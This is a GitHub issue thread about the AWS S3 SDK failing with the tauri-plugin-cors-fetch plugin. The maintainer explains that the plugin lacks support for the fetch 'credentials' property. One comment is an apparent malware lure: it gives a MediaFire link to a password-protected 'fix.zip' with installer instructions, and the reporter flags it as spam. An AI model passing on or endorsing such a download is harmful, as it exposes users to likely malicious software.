### ISSUE TITLE
@aws-sdk not working with tauri-cors-fetch

### ISSUE THREAD

**Issue by himalay34** [idootop/tauri-plugin-cors-fetch#2]
in nodejs , @aws-dbk/client-s3 works well with same code given below. but  in tauri with tauri-cors-fetch it showing following error .

![image](https://github.com/user-attachments/assets/536f4a31-e493-4d9d-8b68-1d9e0e2910f3)

without tauri-cors-fetch , cors issue occurs

code i tried :

![image](https://github.com/user-attachments/assets/152879e5-2750-4d84-ae87-1b43b4332bb7)

![image](https://github.com/user-attachments/assets/a489c5c0-153b-4a44-b014-f4fc9bb87af3)

nodejs working project link: https://glitch.com/edit/#!/flowery-cloud-goal?path=src%2Fs3.js%3A9%3A19

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by himalay34** [comment]
@Vomgnar sorry i cant get you, would you give me some explanation?

**Comment by himalay34** [comment]
> @Vomgnar sorry i cant get you, would you give me some explanation?

i think  he is a spammer, sharing malicious software

**Comment by idootop** [comment]
Unfortunately, this library currently supports only some of the `fetch` method parameters (such as `url`, `headers`, `method`, and `body`) and does not support the `credentials` property.

Since `@aws-dbk/client-s3` relies on the credentials property for handling [credentials](https://github.com/smithy-lang/smithy-typescript/blob/165e04a7b8956181420b4f10c601d0bbdf97f8cc/packages/fetch-http-handler/src/fetch-http-handler.ts#L114), it will not work with this library.

<img width="878" alt="图片" src="https://github.com/user-attachments/assets/21b446f6-01c0-4906-b503-074878382d93">

**Comment by himalay34** [comment]
thanks for explanation. now im closing the issue..
